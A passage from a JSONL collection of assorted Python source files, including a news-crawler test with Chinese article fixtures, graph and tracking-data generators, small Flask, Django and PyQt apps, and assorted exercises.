為了方便民眾居家檢測新冠肺炎,食藥署在19日公布核准5款家用快篩試劑,可就近到藥局、醫療器材販售業者,如藥妝店、醫療器材行、便利商店等商家選購。萊爾富位於雙北的2家門市明(23)日起將首度開賣家用快篩試劑,每店限量100盒,售完為止。萊爾富首度引進國產泰博科技的「福爾威創家用新型冠狀病毒抗原快速檢驗套組」,明天下午3點起,將在台北市迪化店、北縣五工店限量開賣,每盒5入售價1700元,每店限量100盒,不拆售。根據食藥署公布的指引,如果快篩陽性,居家檢疫或隔離者須先與衛生單位聯繫,一般民眾則到社區採檢院所採檢確認;如果是陰性,民眾仍要遵循防疫規範,做好個人防護,持續自我健康管理。(快篩試劑資料照)\\r\\n \",\n keywords=None,\n category=None,\n media=\"中國廣播公司\",\n datetime=\"2021/06/22 18:49 報導\",\n link=\"https://www.bcc.com.tw/newsView.6473942\",\n ),\n)\n\nTEST_DATA_2 = TEST_DATA(\n name=\"中國廣播公司_2\",\n link=\"https://www.bcc.com.tw/newsView.4839712\",\n expected_output=NewsStruct(\n title=\"台積電衝關未成 聯電ADR爆漲股價再登新高\",\n content=\"\\r\\n 半導體類股正當紅,台積電今天(24日)早盤衝關500元短暫達標後拉回,聯電延續昨天的強勢,在ADR飆漲超過20%助威下,股價漲幅超過7%,最高攻至39.7元,市值擠下股王大立光,繼續成為台股人氣王。因為聯電的狂飆,大盤儘管稍事休息,拉回的幅度也很有限。(張佳琪報導)台股週一的兩大支柱台積電、聯電,週二股價兩樣情,台積電挑戰500元大關,早盤開盤隨即攻頂,但是衝高後買盤追價謹慎,導致股價翻黑呈現小跌。聯電因週一股價漲停板鎖住,美國ADR強漲20.24%,帶動股價開盤後強勢走高,隨即衝過39元一路向上,攻至39.7元,股價又改寫18年新高,且追價買單積極,漲幅超過7%,市值擠下股王大立光。讓股價瞬間點火爆衝的關鍵是美系外資分析師最新出具的報告大力看好聯電。理由是受惠於5G、AI、高速運算等發展,聯電產用率將提高至90%到95%,因此,8吋晶圓價格調漲、12吋晶圓產用率提升,以及28奈米拓展有成,推估聯電明後年資本支出將達12億美元,重申「買進」評等,目標價由32元上調至54.5元。分析師表示,三大法人週一同步大買聯電,週二的漲勢,內外資應都有貢獻。至於是否漲到外資報告訂下的目標價,分析師認為,以今年聯電EPS預估2.25元推算,如果漲到54.5元,本益比落在24倍,雖然高但不至於離譜,因此認為如果外資買盤力道夠強,目標價就可能達標。(圖:雅虎奇摩)\\r\\n \",\n keywords=None,\n category=None,\n media=\"中國廣播公司\",\n datetime=\"2020/11/24 11:26 報導\",\n link=\"https://www.bcc.com.tw/newsView.4839712\",\n ),\n)\n\nTEST_DATA_LIST = [TEST_DATA_1, TEST_DATA_2]\n\n\n@pytest.fixture(scope=\"module\")\ndef newsCrawler():\n logger.warning(\"Init News Crawler ...\")\n return bcc.BCC()\n\n\n@pytest.mark.parametrize(\n argnames=\"name, link, expected_output\",\n argvalues=[tuple(t) for t in TEST_DATA_LIST],\n ids=[\n f\"{t.name}, {t.link[:50]+'...' if len(t.link) > 50 else t.link}\"\n for t in TEST_DATA_LIST\n ],\n)\ndef test_get_info(\n newsCrawler,\n name,\n link,\n expected_output,\n):\n output = newsCrawler.getInfo(link=link)\n assert NewsStruct.__2dict__(output) == NewsStruct.__2dict__(expected_output)\n","sub_path":"tests/media/test_bcc.py","file_name":"test_bcc.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"597748810","text":"#!/usr/bin/python\n\nfrom graph_algorithms import *\nfrom structures import *\n\n\ng = Graph()\n\nfor i in ['A', 'B', 'C', 'D']:\n g.add_vertex(i)\n\ng.add_edge(2, 0, 1)\ng.add_edge(1, 0, 3)\ng.add_edge(2, 1, 3)\ng.add_edge(3, 2, 3)\n\ntry:\n Bellman_Ford(g, 0)\nexcept NegativeWeightCycle:\n print(\"run-time error: negative-weight cycle found\")\n","sub_path":"exercise.py","file_name":"exercise.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543775918","text":"import hashlib\nfrom faker import Faker\nimport json\nimport random\nimport time\nfrom .. import views\nfrom ..models import Order, Information\n\n# -------------------------\n# --- Utility Functions ---\n# -------------------------\n\n# Return the hashed JSON and the actual JSON of the given dictionary\ndef get_item_hash(item):\n item_json = json.dumps(item, sort_keys=True)\n item_hash = hashlib.sha256()\n item_hash.update(item_json.encode())\n return item_hash.hexdigest(), item_json\n\n# Add item_hash to the blockchain and return the block the item_hash was stored in\ndef add_to_unconfirmed(item_hash):\n views.add_to_unconfirmed(item_hash)\n views.save_blockchain_to_file()\n return -1\n\n# ------------------------\n# --- Misc. Generators ---\n# ------------------------\n\n# Here we use the 'random' and 'Faker' modules to generate random data for use in tracking\n\ndef get_timestamp(previous_timestamp):\n return previous_timestamp + random.randint(5000, 100000)\n\ndef generate_address():\n fake = Faker()\n return fake.address().replace(\"\\n\", \", \")\n\n# Generate a random delivery method using weighted probabilities\ndef generate_delivery_method():\n methods = [(\"truck\", 0.5), (\"train\", 0.2), (\"boat/ship\", 0.2), (\"plane\", 0.1)]\n method_val = random.random()\n for method, prob in methods:\n if prob >= method_val:\n return method\n method_val -= prob\n\n# NOTE(brandon) - We may want to give the ability for customers to click on a shipping company and\n# see more detailed information about them, in which case we will need some sort of database of companies\ndef generate_shipping_company():\n fake = Faker()\n return fake.company()\n\n# NOTE(brandon) - Same note as for the shipping company\ndef generate_qa_company():\n fake = Faker()\n return fake.company()\n\n# Generate a fake temperature based on the product type.\ndef generate_temperature(product):\n product = product.lower()\n if product == \"milk\":\n return round(random.uniform(3, 7), 2)\n if product == \"yoghurt\":\n return round(random.uniform(3, 7), 2)\n if product == \"beef\":\n return round(random.uniform(0, 5), 2)\n return -1\n\n# Generate a fake quality rating and quality note based on the product type.\ndef generate_quality(product):\n\n product = product.lower()\n ratings = {\n \"very_bad\": {\n \"range\": [0.0, 3.0],\n \"notes\": {\n \"milk\": [\n \"Unhealthy amounts of bacteria were found\",\n \"Leaks found in bottles\",\n ],\n \"yoghurt\": [\n \"Algae found in yoghurt storage\",\n ],\n \"beef\": [\n \"Algae found in beef storage\"\n ]\n }\n },\n \"bad\": {\n \"range\": [3.0, 6.0],\n \"notes\": {\n \"milk\": [\n \"Milk hasn't been pasteurised completely\",\n ],\n \"yoghurt\": [\n \"Uneven consistency\",\n ],\n \"beef\": [\n \"Beef has been bruised in travel\"\n ]\n }\n },\n \"acceptable\": {\n \"range\": [6.0, 8.5],\n \"notes\": {\n \"milk\": [\n \"Dents found in bottle\",\n ],\n \"yoghurt\": [\n \"Malformed Containers\",\n ],\n \"beef\": [\n \"Beef fat has been torn\"\n ]\n }\n },\n \"good\": {\n \"range\": [8.5, 10.0],\n \"notes\": {\n \"milk\": [\n \"No issues\",\n ],\n \"yoghurt\": [\n \"No issues\",\n ],\n \"beef\": [\n \"No issues\"\n ]\n }\n },\n }\n\n quality_frequencies = [(\"very_bad\", 0.1), (\"bad\", 0.2), (\"acceptable\", 0.3), (\"good\", 0.4)]\n quality_roll = random.random()\n for quality, quality_prob in quality_frequencies:\n if quality_roll <= quality_prob:\n # Generate the random rating/note using the info in 'ratings'\n rating = round(random.uniform(ratings[quality][\"range\"][0], ratings[quality][\"range\"][1]), 1)\n note = random.choice(ratings[quality][\"notes\"][product])\n break\n quality_roll -= quality_prob\n\n return rating, note\n\n# -------------------------------------\n# --- Main Tracking Info Generators ---\n# -------------------------------------\n\n# Generate the next tracking item\ndef generate_next_item(previous_hash, previous_item_location, previous_state, previous_items, basic_order_info):\n\n # For each state, give the probabilities that it will be to each other state. This function\n # should never get called with previous_state = \"delivered\", it is just here for completeness.\n # The probabilities in the entry for each state should add up to 1.\n # NOTE(brandon): If we want to, we can use len(previous_items) to influence these parameters,\n # so that the item is less likely to keep bouncing between delivery stations\n state_transition = {\n \"order_placed\": [(\"order_received\", 1.0)],\n \"order_received\": [(\"sent_to_checkpoint\", 0.8), (\"sent_to_customer\", 0.2)],\n \"sent_to_checkpoint\": [(\"arrived_at_checkpoint\", 1.0)],\n \"arrived_at_checkpoint\": [(\"temperature_check\", 0.2), (\"quality_check\", 0.2), (\"temp_and_quality_check\", 0.1), (\"sent_to_checkpoint\", 0.15), (\"sent_to_customer\", 0.35)],\n \"temperature_check\": [(\"sent_to_checkpoint\", 0.5), (\"sent_to_customer\", 0.5)],\n \"quality_check\": [(\"sent_to_checkpoint\", 0.5), (\"sent_to_customer\", 0.5)],\n \"temp_and_quality_check\": [(\"sent_to_checkpoint\", 0.5), (\"sent_to_customer\", 0.5)],\n \"sent_to_customer\": [(\"delivered\", 1.0)],\n \"delivered\": [(\"delivered\", 1.0)],\n }\n\n # Use the state transition dict to generate the new state\n state_val = random.random()\n for new_state, prob in state_transition[previous_state]:\n if prob >= state_val:\n next_state = new_state\n break\n state_val -= prob\n \n # Create the tracking info\n order_info = {\n \"order_id\": previous_items[0].order_id,\n \"order_state\": next_state,\n \"time_stamp\": get_timestamp(previous_items[len(previous_items) - 1].time_stamp),\n \"previous_hash\": previous_hash,\n \"previous_block_loc\": previous_item_location\n }\n\n # --- Add additional info needed by different states ---\n\n # When the order is received, add the designated start point\n if next_state == \"order_received\":\n order_info[\"location\"] = generate_address()\n\n # When the order is sent, give the location it is being sent from/to, as well as information\n # about shipping. Use the previous tracking item to dictate the starting address\n if next_state == \"sent_to_checkpoint\" or next_state == \"sent_to_customer\":\n if (previous_items[len(previous_items) - 1].location != \"NULL\"):\n order_info[\"start_location\"] = previous_items[len(previous_items) - 1].location\n else:\n order_info[\"start_location\"] = previous_items[len(previous_items) - 1].end_location\n if next_state == \"sent_to_checkpoint\":\n order_info[\"end_location\"] = generate_address()\n else:\n order_info[\"end_location\"] = basic_order_info.delivery_address\n order_info[\"delivery_method\"] = generate_delivery_method()\n order_info[\"shipping_company\"] = generate_shipping_company()\n\n \n # NOTE(brandon) - We may also want to add in more shipping info such as truck temperature\n \n # When the order has arrived (or been delivered), we just need the information from the last tracking item\n if next_state == \"arrived_at_checkpoint\" or next_state == \"delivered\":\n order_info[\"start_location\"] = previous_items[len(previous_items) - 1].start_location\n order_info[\"end_location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"delivery_method\"] = previous_items[len(previous_items) - 1].delivery_method\n order_info[\"shipping_company\"] = previous_items[len(previous_items) - 1].shipping_company\n \n # For a temperature checking station, we use the location from the last tracking item as well\n # as a company that is doing the assessing\n if next_state == \"temperature_check\":\n order_info[\"location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"temperature\"] = generate_temperature(basic_order_info.product_name)\n order_info[\"qa_company\"] = generate_qa_company()\n\n # Quality checking station is mostly the same as above, but we generate a rating and a note\n if next_state == \"quality_check\":\n order_info[\"location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"quality_rating\"], order_info[\"quality_note\"] = generate_quality(basic_order_info.product_name)\n order_info[\"qa_company\"] = generate_qa_company()\n\n # Temperature and quality checking station combines the above two\n if next_state == \"temp_and_quality_check\":\n order_info[\"location\"] = previous_items[len(previous_items) - 1].end_location\n order_info[\"temperature\"] = generate_temperature(basic_order_info.product_name)\n order_info[\"quality_rating\"], order_info[\"quality_note\"] = generate_quality(basic_order_info.product_name)\n order_info[\"qa_company\"] = generate_qa_company()\n\n return order_info\n\ndef add_first_tracking_item(order):\n\n # The first tracking state will be when the order is placed. This will be used to show a record\n # that the order was placed at a certain time.\n order_place = {\n \"order_id\": order.id,\n \"order_state\": \"order_placed\",\n \"time_stamp\": get_timestamp(int(time.time())),\n \"user\": order.user,\n \"product_name\": order.product_name,\n \"producer_name\": order.producer_name,\n \"quantity\": order.quantity,\n \"delivery_address\": order.delivery_address\n }\n\n item_hash, hashed_text = get_item_hash(order_place)\n item_location = add_to_unconfirmed(item_hash)\n\n order_place[\"hash\"] = item_hash\n order_place[\"hashed_text\"] = hashed_text\n order_place[\"block_loc\"] = item_location\n\n views.add_database(**order_place)\n\ndef add_next_tracking_item(order_id):\n\n basic_order_info = Order.objects.get(id=order_id)\n tracking_items = Information.objects.filter(order_id=order_id).order_by('time_stamp')\n\n previous_state = tracking_items[len(tracking_items) - 1].order_state\n \n # Don't generate a new item if the order has already been delivered\n if previous_state == \"delivered\":\n return\n\n previous_hash = tracking_items[len(tracking_items) - 1].hash\n previous_location = tracking_items[len(tracking_items) - 1].block_loc\n current_item = generate_next_item(previous_hash, previous_location, previous_state, tracking_items, basic_order_info)\n \n item_hash, hashed_text = get_item_hash(current_item)\n item_location = add_to_unconfirmed(item_hash)\n views.broadcast_tx(item_hash)\n current_item[\"hash\"] = item_hash\n current_item[\"hashed_text\"] = hashed_text\n current_item[\"block_loc\"] = item_location\n \n views.add_database(**current_item)\n return current_item[\"order_state\"]\n\n# Continually generate tracking items until the 'delivered' state is reached\ndef generate_full_tracking(order_id):\n while (add_next_tracking_item(order_id) != \"delivered\"):\n pass","sub_path":"ResiBuyer/utils/tracking_info.py","file_name":"tracking_info.py","file_ext":"py","file_size_in_byte":11579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"416006993","text":"\"\"\"Added table: SurveyFiles\n\nRevision ID: 1315361d05e7\nRevises: 602b5a2889c\nCreate Date: 2015-05-29 09:40:10.793000\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1315361d05e7'\ndown_revision = '602b5a2889c'\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n\ndef upgrade():\n op.create_table('survey_files',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('Filename', sa.String(length=32), nullable=False),\n sa.Column('Timemark', sa.DateTime(), nullable=False),\n sa.PrimaryKeyConstraint('id'))\n\n\ndef downgrade():\n op.drop_table('survey_files')\n","sub_path":"migrations/versions/1315361d05e7_added_table_surveyfiles.py","file_name":"1315361d05e7_added_table_surveyfiles.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"36851628","text":"from flask import Flask, request, render_template, redirect\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom stories import stories, StoryList\n\n\napp = Flask(__name__)\n\n# the toolbar is only enabled in debug mode:\napp.debug = True\n\napp.config['SECRET_KEY'] = \"asdfasdfsdafdsfdasfaf\"\ndebug = DebugToolbarExtension(app)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef chose_story():\n \"\"\"Choose story from list and generate the story to ask words. \"\"\"\n if request.method == 'POST':\n storyId = int(request.form['story_id'])\n return render_template('story_form.html', stories = stories.values(), story = stories[storyId])\n else:\n return render_template('story_form.html', stories = stories.values(), story=None)\n\n\n@app.route('/story')\ndef story():\n \"\"\"Show story\"\"\"\n storyId = int(request.args[\"story_id\"])\n story = stories[storyId]\n story_text = story.generate(request.args)\n\n return render_template('story.html', story=story_text)\n\n\n@app.route(\"/story/new\", methods=['POST'])\ndef create_story():\n \"\"\" Create new story \"\"\"\n title = request.form[\"title\"]\n words = request.form.getlist('words')\n template = request.form[\"template\"]\n\n StoryList.createStory(title, words, template)\n\n return redirect(\"/\")\n\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546756","text":"def getId(m,n):\n s = []\n for i in range(n):\n s.append(i)\n A = s.pop()\n B = s.pop()\n while s:\n if knows(A , B):\n A = s.pop()\n else:\n B = s.pop()\n if knows(A,B):\n c= B\n else:\n c = A\n for i in range(n):\n if (i != c) and (knows(c,i) or (not knows(i,c))) :\n return -1\n return c\n \n","sub_path":"Stack/The Celebrity Problem.py","file_name":"The Celebrity Problem.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"590065359","text":"from django.conf.urls import patterns, include, url\nfrom main_site.views import *\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'ukrainian_squad_info.views.home', name='home'),\n\n url(r'^$',index),\n url(r'^about$',about),\n url(r'^news/([0-9]+)?/$',news),\n\n url(r'^help$',help_all),\n url(r'^help/([0-9]+)?/$',help_item),\n\n # url(r'^blog/', include('blog.urls')),\n\n (r'^admin/', include(admin.site.urls)),\n (r'^grappelli/', include('grappelli.urls')),\n)\n","sub_path":"ukrainian_squad_info/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"29329196","text":"#!/usr/bin/python\nimport rss_db\nimport urllib2\nimport os\n\nclass layout:\n\tdef init(self,title,addr,desc,footer):\n\t\tself._TITLE = title\n\t\tself._ADDR = addr\n\t\tself._DESC = desc\n\t\tself._FOOTER = footer\n\t\tself._IMAGES = []\n\t\n\tdef __init__(self):\n\t\tself.init(\"default title\",\"default addr\",\"default desc\",\"default footer\")\n\t\n\tdef download(self,url,filename):\n\t\tif (os.path.exists(filename)):\n\t\t\treturn\n\t\tf = urllib2.urlopen(url)\n\t\tfout = open(filename,\"wb\")\n\t\tfout.write(f.read())\n\t\tfout.close()\n\t\tf.close()\n\t\t\n\tdef name(self):\n\t\treturn \"Default HTML Document\"\n\t\t\n\tdef get_refresh(self):\n\t\treturn \"\"\n\t\n\tdef get_menu(self,db):\n\t\tfeeds = db.read_allfeeds()\n\t\tretval = \"\"\n\t\tretval += \"\\\"home\\\"View 100 latest topics
\"\n\t\tfor item in feeds:\n\t\t\ttry:\n\t\t\t\timg = item[3].lower().replace(\" \",\"\") + \".ico\"\n\t\t\t\tif (item[4]):\n\t\t\t\t\tself.download(url=item[4],filename=\"tmp/\"+img)\n\t\t\t\tretval += \"\\\"\"+item[3]+\"\\\"\"+item[3]+\"
\"\n\t\t\t\tself._IMAGES.append(\"tmp/\"+img)\n\t\t\texcept TypeError:\n\t\t\t\tretval += \"\"+item[3]+\"
\"\n\t\treturn retval\n\t\t\n\tdef header(self,db=None):\n\t\tretval = \"\"\n\t\tretval += \"\\n\"\n\t\tretval += \"\\n\\n\"+self._TITLE+\"\"\n\t\tretval += \"\"\n\t\tretval += self.get_refresh()\n\t\tretval += \"\\n\\n\"\n\t\tretval += \"
\\n
\"\n\t\tif db:\n\t\t\tretval += self.get_menu(db)\n\t\tretval += \"
\\n
\"\n\t\treturn retval\n\t\n\tdef footer(self):\n\t\tretval = \"
\"\n\t\tretval += \"\\n\"\n\t\tretval += \"\\n\\n\\n\"\n\t\treturn retval\n\n\tdef content(self,feeds,db):\n\t\tretval = \"\"\n\t\tretval += \"\\n\"\n\t\tfor line in feeds:\n\t\t\tretval += \"\\n\"\n\t\t\tdate,title,url,feedid = line\n\t\t\tfeedname = db.read_feedname(feedid)\n\t\t\tfeedurl = db.read_feedurl(feedid)\n\t\t\tretval += \"\"\n\t\t\tretval += \"\"\n\t\t\tretval += \"\\n\\n\"\n\t\tretval += \"
\"+title+\"\"\n\t\t\tretval += \"\"\n\t\t\tretval += feedname\n\t\t\tretval += \"\"\n\t\t\tretval += \"\"+date+\"
\\n\"\n\t\treturn retval\n\t\t\n\tdef files(self):\n\t\tretval = []\n\t\tretval.append(\"templates/default/show.php\")\n\t\t#retval.append(\"templates/default/redirect.php\")\n\t\tretval.append(\"templates/default/style.css\")\n\t\tretval.append(\"templates/default/home.png\")\n\t\tfor image in self._IMAGES:\n\t\t\tretval.append(image)\n\t\treturn retval\n\n\tdef filename(self):\n\t\treturn \"index.php\"\n","sub_path":"rssreader/templates/default/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220883663","text":"import json\n\ndef parse_vinnsl(vinnsl):\n\n nn_structure = {}\n\n parsed_json = json.loads(vinnsl)\n parameters = parsed_json['parameters']['input']\n structure = parsed_json['structure']\n\n learning_rate = parameters[0]['defaultValue']\n biasInput = parameters[1]['defaultValue']\n biasHidden = parameters[2]['defaultValue']\n momentum = parameters[3]['defaultValue']\n activationFunctionOutput = parameters[4]['defaultValue']\n activationFunctionHidden = parameters[5]['defaultValue']\n threshold = parameters[6]['defaultValue']\n target_data = parameters[7]['defaultValue']\n number_epochs = parameters[8]['defaultValue']\n\n connections = parsed_json['connections']\n\n fully_connected = connections['fullyConnected']['isConnected']\n shortcuts = connections['shortcuts']\n shortcuts_connections = shortcuts['connections']\n\n print(fully_connected)\n\n input_layer = structure['inputLayer']\n input_neurons = input_layer['amount']\n\n outputLayer = structure['outputLayer']\n output_neurons = outputLayer['amount']\n\n hidden_layers = structure['hiddenLayer']\n hidden_layers_neurons = []\n\n for layer in hidden_layers:\n hidden_layers_neurons.append(layer['amount'])\n\n nn_structure['input_neurons'] = input_neurons\n nn_structure['output_neurons'] = output_neurons\n nn_structure['hidden_layers'] = hidden_layers_neurons\n\n nn_structure['learning_rate'] = learning_rate\n nn_structure['biasInput'] = biasInput\n nn_structure['biasHidden'] = biasHidden\n nn_structure['momentum'] = momentum\n nn_structure['activationFunctionOutput'] = activationFunctionOutput\n nn_structure['activationFunctionHidden'] = activationFunctionHidden\n nn_structure['threshold'] = threshold\n nn_structure['target_data'] = target_data\n nn_structure['number_epochs'] = number_epochs\n\n print(nn_structure)\n\n return nn_structure","sub_path":"vinnsl_decoder.py","file_name":"vinnsl_decoder.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"307732290","text":"#\n# 2D L-world generation here.\n#\nimport random;\nimport numpy as np;\n\n\ndef paint(A, rewards, startX, offX, startY, offY, color, reward):\n A[startX:startX + offX, startY:startY + offY] = color;\n rewards[startX:startX + offX, startY:startY + offY] = reward\n\n\nclass ColorWorld:\n # Constructor.\n def __init__(self, w, h):\n self.w = w;\n self.h = h;\n\n # Declare/Initialise other vairables here.\n\n # Return an ndarray of 3 dimensions.( 3 colors. )\n def get_world(self):\n rand = random.random();\n grid = np.zeros((self.w, self.h, 3));\n rewards = np.zeros((self.w, self.h));\n\n if rand > 0.5:\n \"\"\"\n # left blue.\n grid[0][self.w-1] = (0, 0, 1);\n # right red.\n grid[self.h-1][0] = (1, 0, 0);\n # Middle yellow.\n start_w = self.w/2;\n end_w = self.w/2 + 1;\n start_h = self.h/2;\n end_h = self.h/2 + 1;\n paint( grid, start_h, 2, start_w, 2, (1,1,0) );\n \"\"\"\n\n # left red.\n # grid[0][self.w-1] = (0, 0, 1);\n paint(grid, rewards, 0, 4, self.w - 4, 4, (1, 0, 0), -4);\n # right blue.\n # grid[self.h - 1][0] = (1, 0, 0);\n paint(grid, rewards, self.h - 4, 4, 0, 4, (0, 0, 1), 1);\n # Middle yellow.\n paint(grid, rewards, self.h / 2, 4, self.w / 2, 4, (1, 1, 0), 0);\n\n else:\n # left blue.\n # grid[0][self.w-1] = (0, 0, 1);\n paint(grid, rewards, 0, 4, self.w - 4, 4, (0, 0, 1), 1);\n # right red.\n # grid[self.h - 1][0] = (1, 0, 0);\n paint(grid, rewards, self.h - 4, 4, 0, 4, (1, 0, 0), -4);\n # Middle green.\n paint(grid, rewards, self.h / 2, 4, self.w / 2, 4, (0, 1, 0), 0);\n\n return np.transpose(grid, [0, 1, 2]), rewards;\n","sub_path":"environment/color_world.py","file_name":"color_world.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136102741","text":"# TASK 6\n\n# 1\na1 = input(\"Enter a string: \")\na2 = [a3 for a3 in a1 if a3.isupper() == 1]\nprint(a2)\n\n\n# 2\nstudents = ['Smit', 'Jaya', 'Rayyan']\nsubjects = ['CSE', 'Networking', 'Operating System']\npairs = {a4: a5 for (a4, a5) in zip(students, subjects)}\nprint(pairs)\n\n\n# 4\ndef rev(a8):\n strlen = len(a8)\n for a9 in range(strlen - 1, - 1, - 1):\n yield a8[a9]\n\n\na6 = input(\"Enter a string to reverse: \")\na10 = []\nfor lett in rev(a6):\n a10.append(lett)\na10 = ''.join(a10)\nprint(a10)\n\n\n# 5\ndef inc(x):\n return x + 1\n\n\ndef dec(x):\n return x - 1\n\n\ndef operate(func, x):\n result = func(x)\n return result\n\n\nr1 = operate(inc, 3)\nr2 = operate(dec, 3)\nprint(r1, r2)\n","sub_path":"py_tasks/Task6.py","file_name":"Task6.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112311620","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nГлавное окно\n\"\"\"\n\nfrom PyQt4 import QtGui, uic, QtCore\nimport os.path\nimport SAID.data_handling as data_handling\nimport SAID.pca as pca\nfrom .constants import *\nfrom SAID.config import Config\nfrom .element import Element\nfrom .drawing import draw\n\nclass MyWindow(QtGui.QMainWindow):\n def __init__(self, qt_app):\n QtGui.QWidget.__init__(self, None)\n uic.loadUi('SAID/Files/SAID.ui', self)\n # присваиваем пути сохранения файла\n self.config = Config()\n self.set_language(self.config.lang) # переписываем элементы интерфейса на выбранный язык\n # связываем события со слотами\n self.connect(self.action_open_file, QtCore.SIGNAL('triggered()'), QtCore.SLOT('open_file()'))\n self.connect(self.action_save_file, QtCore.SIGNAL('triggered()'), QtCore.SLOT('save_file()'))\n self.connect(self.action_exit, QtCore.SIGNAL('triggered()'), QtCore.SLOT('close()'))\n self.connect(self.action_Qt, QtCore.SIGNAL('triggered()'), qt_app, QtCore.SLOT('aboutQt()'))\n self.connect(self.action_PCA_midpoint, QtCore.SIGNAL('triggered()'), lambda: self.runPCA(PCA_MIDPOINT))\n self.connect(self.action_PCA_vertex, QtCore.SIGNAL('triggered()'), lambda: self.runPCA(PCA_VERTEX))\n self.connect(self.action_draw_2D, QtCore.SIGNAL('triggered()'), lambda: self.drawing('2D'))\n self.connect(self.action_draw_3D, QtCore.SIGNAL('triggered()'), lambda: self.drawing('3D'))\n self.connect(self.set_lang_ru, QtCore.SIGNAL('triggered()'), lambda: self.set_language('ru'))\n self.connect(self.set_lang_de, QtCore.SIGNAL('triggered()'), lambda: self.set_language('de'))\n self.connect(self.set_lang_en, QtCore.SIGNAL('triggered()'), lambda: self.set_language('en'))\n # добавляем иконки\n self.action_exit.setIcon(QtGui.QIcon('SAID//Files//Icons//exit.png'))\n self.action_save_file.setIcon(QtGui.QIcon('SAID//Files//Icons//save.png'))\n self.action_open_file.setIcon(QtGui.QIcon('SAID//Files//Icons//open.png'))\n self.action_PCA_midpoint.setIcon(QtGui.QIcon('SAID//Files//Icons//startPCA.png'))\n self.action_PCA_vertex.setIcon(QtGui.QIcon('SAID//Files//Icons//startPCA2.png'))\n self.action_draw_2D.setIcon(QtGui.QIcon('SAID//Files//Icons//visualization2.png'))\n self.action_draw_3D.setIcon(QtGui.QIcon('SAID//Files//Icons//visualization3.png'))\n self.set_lang_ru.setIcon(QtGui.QIcon('SAID//Files//Icons//ru.png'))\n self.set_lang_de.setIcon(QtGui.QIcon('SAID//Files//Icons//de.png'))\n self.set_lang_en.setIcon(QtGui.QIcon('SAID//Files//Icons//en.png'))\n # кнопки на fileToolBar\n self.fileToolBar = self.addToolBar('')\n self.fileToolBar.addAction(self.action_open_file)\n self.fileToolBar.addAction(self.action_save_file)\n self.fileToolBar.addAction(self.action_exit)\n # присваиваем кнопки на mainToolBar\n self.mainToolBar = self.addToolBar('')\n self.mainToolBar.addAction(self.action_PCA_midpoint)\n self.mainToolBar.addAction(self.action_PCA_vertex)\n self.mainToolBar.addAction(self.action_draw_2D)\n self.mainToolBar.addAction(self.action_draw_3D)\n # присваиваем клавишные команды\n self.action_open_file.setShortcut('Ctrl+O')\n self.action_save_file.setShortcut('Ctrl+S')\n self.action_exit.setShortcut('Alt+X')\n # видимость элементов\n self.table.setVisible(False)\n self.action_save_file.setEnabled(False) # сохранять пока нечего\n self.action_PCA_midpoint.setEnabled(False) # и вызывать метод пока не для чего\n self.action_PCA_vertex.setEnabled(False)\n self.action_draw_2D.setEnabled(False)\n self.action_draw_3D.setEnabled(False)\n\n @QtCore.pyqtSlot()\n def open_file(self):\n path = QtGui.QFileDialog.getOpenFileName(directory = self.config.open_dir, filter = '*.csv')\n if path == '':\n return\n # сохраняем путь до файла\n self.config.open_dir = os.path.dirname(path)\n self.create_table(data_handling.loading(path))\n self.action_draw_2D.setEnabled(False)\n self.action_draw_3D.setEnabled(False)\n\n @QtCore.pyqtSlot()\n def save_file(self):\n path = QtGui.QFileDialog.getSaveFileName(directory = self.config.save_dir, filter = '*.csv')\n if path:\n # сохраняем путь до файла\n self.config.save_dir = os.path.dirname(path)\n # читаем данные\n table_model = self.table.model()\n data = []\n for row in range(table_model.rowCount()):\n data.append([table_model.takeVerticalHeaderItem(row).text()])\n for column in range(table_model.columnCount()):\n data[row].append(table_model.data(table_model.index(row, column)))\n data_handling.save_in_file(path, data)\n\n # главный обработчик событий\n def event(self, e):\n if e.type() == QtCore.QEvent.Close:\n # здесь выводим модульное окно поддтверждения выхода\n ret = QtGui.QMessageBox.question(self, 'Подтверждение действия', 'Вы уверены что хотите выйти?', 'Да', 'Нет')\n if ret == 1: # отменили выход\n e.ignore()\n return\n # сохраняем наш конфиг\n self.config.save()\n return QtGui.QWidget.event(self, e) # отправляем\n\n # отрисовка таблицы\n def create_table(self, elements):\n data = self.set_table_model([el.coordinates for el in elements], [el.header for el in elements])\n # после создания модели создаём таблицу под неё\n 